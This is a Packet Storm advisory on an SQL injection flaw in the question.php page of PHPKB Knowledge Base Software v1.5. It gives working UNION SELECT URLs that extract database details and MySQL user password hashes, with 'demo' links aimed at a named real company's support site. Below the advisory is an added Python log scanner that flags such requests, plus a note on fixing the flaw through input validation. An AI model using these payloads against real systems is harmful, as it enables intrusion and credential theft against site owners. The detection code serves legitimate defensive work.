phpkb-1.5-question.php.txt

2008-09-22T00:00:00
ID PACKETSTORM:70167
Type packetstorm
Reporter d3v1l
Modified 2008-09-22T00:00:00

Description

                                        
                                            `[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability  
[~]   
[~] http://www.knowledgebase-script.com  
[~] ----------------------------------------------------------  
[~] Bug found by d3v1l  
[~]   
[~] Date: 20.09.2007  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]   
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]   
[~] Pentest|Gibon|Pig  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*  
[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/*   
[~]   
[~] If it does not work, try -> /question.php?ID=-1  
[~]   
[~] Demo :-   
[~]  
[~] http://support.prosoft-technology.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/*   
[~]   
[~] http://support.prosoft-technology.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/*  
[~]   
[~]----------------------------------------------------------------------------------------------------------------------  
  
`
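
A detection sketch for the request pattern in this advisory, added here as an example and not part of the original post: it flags access-log requests to question.php whose ID parameter is not a plain integer. The log lines are constructed, and treating every legitimate ID value as numeric is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; the IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Sep/2008:10:01:02 +0000] "GET /kb/question.php?ID=42 HTTP/1.1" 200 5120
203.0.113.9 - - [22/Sep/2008:10:01:07 +0000] "GET /kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/* HTTP/1.1" 200 812
203.0.113.9 - - [22/Sep/2008:10:01:09 +0000] "GET /kb/question.php?ID=-1+UNION+SELECT+concat(user,char(58),password)+FROM+mysql.user/* HTTP/1.1" 200 790
203.0.113.7 - - [22/Sep/2008:10:02:00 +0000] "GET /kb/index.php?ID=abc HTTP/1.1" 200 300
"""

# Lazy match on the target tolerates raw (unencoded) spaces in the URL.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Markers taken from the payloads shown in the advisory.
SIGNS = [
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("sql-comment", re.compile(r"/\*|--")),
    ("negative-id", re.compile(r"^-\d+")),
]

def classify(value):
    """Return None for a plain integer ID, else a list of reasons it is suspicious."""
    if re.fullmatch(r"\d+", value):
        return None
    reasons = [name for name, rx in SIGNS if rx.search(value)]
    return reasons or ["non-numeric"]

def scan(log_text):
    """Return (client_ip, decoded_ID, reasons) for each suspicious question.php request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/question.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("ID", []):
            reasons = classify(value)
            if reasons:
                hits.append((ip, value, reasons))
    return hits

if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(ip, reasons, value)
```

The same integer-only rule applied in question.php before the value reaches the query, or a parameterized query, closes the hole that this log check only observes.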